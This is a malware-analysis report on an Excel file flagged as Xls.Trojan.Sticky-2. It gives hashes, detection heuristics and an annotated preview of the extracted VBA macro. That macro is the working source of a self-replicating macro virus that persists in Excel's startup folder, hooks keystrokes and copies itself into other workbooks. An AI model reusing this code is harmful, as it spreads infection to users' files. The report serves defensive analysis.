Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0b9c6bc7d0c5cf4b…

MALICIOUS

Office (OLE)

91.0 KB Created: 1999-03-09 07:55:37 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: d3035d9d521e91ea90f313384ab1e409 SHA-1: 399c968a25ad2b0ecc7932090e4c32c0ba12bba9 SHA-256: 0b9c6bc7d0c5cf4b5ce654083f9718e7eb7ca4fb0ba3afa33adf6a51a2babf67
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing a VBA macro, specifically an Auto_Open macro, which is a common technique for initial execution. The macro attempts to modify Excel's user interface by calling menu and button functions, suggesting it's designed to hide malicious activity or facilitate further execution. The ClamAV detection as 'Xls.Trojan.Sticky-2' strongly indicates malicious intent, likely involving the download of a secondary payload.

Heuristics 3

  • ClamAV: Xls.Trojan.Sticky-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Sticky-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18525 bytes
SHA-256: dbc1c5b19046ff2e49b09ff72d8dbbd5c9006e5bf2cb8ccef7b740f57a61da1e
Detection
ClamAV: Xls.Trojan.Sticky-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sticky"
' Module-level state shared by the three procedures below.
' "Sticky" is both this module's name and the name of the sheet the
' procedures copy into other workbooks (Sheets("Sticky")).
Dim cBook As String           ' name of the active workbook when Enter was intercepted (set in myAction)
Dim EdtOk, mnDltd As Boolean  ' only mnDltd is Boolean; EdtOk has no type clause and is therefore a
                              ' Variant (meCopy relies on that when it tests EdtOk = "")
' Auto_Open: runs automatically when the workbook is opened (the OLE_VBA_AUTO
' finding in the report). What the statements below do:
'   * build TNT.xls in Application.StartupPath (Excel's XLStart folder) via
'     the TNTMake subroutine, so the code is loaded every time Excel starts;
'   * hook the Enter key (OnKey "~") and every sheet activation
'     (OnSheetActivate) to procedures in TNT.xls, which copy the "Sticky"
'     sheet into whatever workbook the user is working in (see meCopy);
'   * call mnu / shrtMn / Bttn, which are not in this excerpt - the report
'     summary describes them as menu and toolbar-button modifications.
' Every runtime error is swallowed by Erhdl (Resume Next), so the procedure
' keeps going whatever fails.
' Defender notes: indicators are a hidden TNT.xls in the Excel startup path
' and a hidden sheet named "Sticky" in otherwise ordinary workbooks.
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo Erhdl                 ' Erhdl is "Resume Next": errors are ignored
    EdtOk = True
    With Application
        .EnableCancelKey = xlDisabled   ' the user cannot break out with Esc / Ctrl+Break
        .DisplayAlerts = False          ' no prompts while files are deleted / saved below
        .ScreenUpdating = False
        If ThisWorkbook.Name = "TNT.xls" Then Workbooks.Add
        ' Is the startup copy (TNT.xls) already open? If not, create it.
        meExist = False
        For Each b In Workbooks
            If UCase(b.Name) = "TNT.XLS" Then meExist = True
        Next
        If meExist = False Then GoSub TNTMake   ' comes back via "Return" below
        ' Hook Enter and sheet activation to the copy living in TNT.xls.
        .OnKey "~", "'TNT.xls'!myAction"
        .OnSheetActivate = "TNT.xls!Sticky.meCopy"
    End With
delMnus:
    ' mnu, shrtMn and Bttn are defined outside this excerpt. mnDltd is reset
    ' here and tested after the first mnu call, so mnu presumably sets it
    ' when the menu entry was already removed - TODO confirm in the full module.
    mnDltd = False
    Call mnu(3, 1, 6, "&U")
    If mnDltd Then Exit Sub
    Call mnu(3, 1, 4, "&M")
    Call mnu(7, 3, 3, "&T")
    Call mnu(7, 5, 4, "&h")
    Call mnu(7, 6, 15, "&n")
    Call mnu(7, 6, 14, "&n")
    Call mnu(7, 6, 13, "&M")
    Call mnu(7, 6, 12, "&M")
    Call mnu(7, 8, 4, "&U")
    Call mnu(8, 3, 3, "&T")
    Call mnu(8, 5, 2, "&h")
    Call mnu(8, 6, 10, "&n")
    Call mnu(8, 6, 8, "&M")
    Call mnu(8, 7, 4, "&U")
    Call mnu(9, 2, 11, "&S")
    Call mnu(9, 3, 3, "&T")
    Call mnu(9, 5, 5, "&I")
    Call mnu(9, 5, 1, "&t")
    Call mnu(9, 6, 14, "&d")
    Call mnu(9, 6, 10, "&M")
    Call mnu(9, 7, 4, "&U") 'next
    Call shrtMn(1, 11)
    Call shrtMn(1, 10)
    Call shrtMn(2, 6)
    Call shrtMn(9, 7)
    Call shrtMn(14, 13)
    Call shrtMn(15, 12)
    Call shrtMn(16, 12) 'next
    Call Bttn(5, 15)
    Call Bttn(7, 5)
    Call Bttn(9, 3)
    Call Bttn(9, 4)
    Call Bttn(9, 6)
    Call Bttn(9, 7)
    Call Bttn(9, 15)
    Exit Sub
TNTMake:
    ' GoSub target: create TNT.xls in Application.StartupPath containing a
    ' hidden copy of the Sticky sheet, then reopen it as a hidden workbook.
    Workbooks("TNT.xls").Close
    With Application
        n = .SheetsInNewWorkbook
        .SheetsInNewWorkbook = 1        ' new workbook with a single sheet
        Workbooks.Add
        .SheetsInNewWorkbook = n        ' restore the user's setting
        ThisWorkbook.Sheets("Sticky").Copy Before:=ActiveSheet
        Set cS = ActiveSheet
        cS.OnSheetActivate = "meHide"   ' meHide is not in this excerpt
        cS.Visible = False
    End With
    s = Application.StartupPath
    Kill s & "\TNT.xls"                 ' remove any earlier copy before saving
    ActiveWorkbook.SaveAs Filename:=s & "\TNT.xls"
    ActiveWindow.Visible = False        ' the workbook stays open but has no visible window
    Workbooks("TNT.xls").Close savechanges:=True
    Workbooks.Open Filename:=s & "\TNT.xls"
    Return
Erhdl:
    Resume Next
End Sub
' meCopy: the replication routine. Auto_Open wires it to
' Application.OnSheetActivate, so it runs whenever the user switches sheets,
' and myAction calls it on every Enter keypress. It copies the hidden
' "Sticky" sheet into the active workbook (unless one is already there) and
' saves that workbook.
' NOTE(review): Sheets("Sticky") shares this module's name; presumably it is
' an Excel 5/95-style module sheet, so copying the sheet carries the macro
' code with it - confirm against the sample.
Sub meCopy()
Attribute meCopy.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo Erhdl                 ' Erhdl is "Resume Next": errors are ignored
    With Application
        .EnableCancelKey = xlDisabled
        .ScreenUpdating = False
        .DisplayAlerts = False
        .OnKey "~", "'TNT.xls'!myAction"   ' (re)hook the Enter key
    End With
    cDrv = Left(CurDir(), 1)            ' drive letter of the current directory
    With ActiveWorkbook
        If ActiveSheet.Name = "Sticky" Then ActiveSheet.Visible = False
        ' Unsaved "BookN" workbooks are skipped unless EdtOk was cleared
        ' (myAction sets EdtOk = False right before calling meCopy).
        ' EdtOk = "" is True while the Variant is still Empty.
        If UCase(Left(.Name, 4)) = "BOOK" Then
            If EdtOk Or EdtOk = "" Then Exit Sub
        End If
        ' Workbook already carries a Sticky sheet: nothing to do.
        For Each sh In .Sheets
            If sh.Name = "Sticky" Then Exit Sub
        Next
        ThisWorkbook.Sheets("Sticky").Copy Before:=ActiveSheet
        Set cS = ActiveSheet
        cS.OnSheetActivate = "meHide"   ' meHide is not in this excerpt
        cS.Visible = False
        ' Workbooks named DATABASE*: replace the sheet password with one
        ' derived from the current second, so it differs on every run.
        If UCase(Left(.Name, 8)) = "DATABASE" Then
            cS.Unprotect password:="Project"
            cS.Protect password:="" & Second(Time) / 11
        End If
        ' Persist the copy, except for unsaved BookN files and the A: drive.
        If UCase(Left(.Name, 4)) <> "BOOK" And cDrv <> "A" Then .Save
    End With
    Exit Sub
Erhdl:
    Resume Next
End Sub
' myAction: bound to the Enter key ("~") by Auto_Open and meCopy. It records
' the active workbook name, sends {DOWN} (presumably to mimic the Enter
' keypress the OnKey hook intercepted), runs meCopy, and then - only on
' Saturday afternoons after 1 May 1998 - shows a message box and schedules
' EnableEdt (not in this excerpt) ten seconds later. Any error jumps to Ex,
' which only resets EdtOk.
Sub myAction()
Attribute myAction.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo Ex
    cBook = ActiveWorkbook.Name
    With Application
        .EnableCancelKey = xlDisabled
        EdtOk = False                   ' lets meCopy proceed on unsaved BookN workbooks as well
        .SendKeys "{DOWN}"
        meCopy
        .OnKey "~"                      ' restore Enter's default action while the check runs
        ' Trigger window: date on/after 1 May 1998, WeekDay = 7 (Saturday
        ' with the default vbSunday first day) and time after 11:59:59 AM;
        ' otherwise fall through to Ex.
        If Now < DateValue("May 1, 1998") Or WeekDay(Now) <> 7 Or _
            Time < TimeValue("11:59:59 AM") Then GoTo Ex
        EnableEdt                       ' defined outside this excerpt
        EdtOk = True
        .OnKey "~", "'TNT.xls'!myAction"   ' re-hook Enter
        MsgBox "Please stop for a while to get relaxed!", 0 + 48, "TNT"   ' 48 = vbExclamation icon
        .OnTime Now + TimeValue("00:00:10"), "'TNT.xls'!EnableEdt"
    End With
Ex:
    EdtOk = True
End Sub
... (truncated)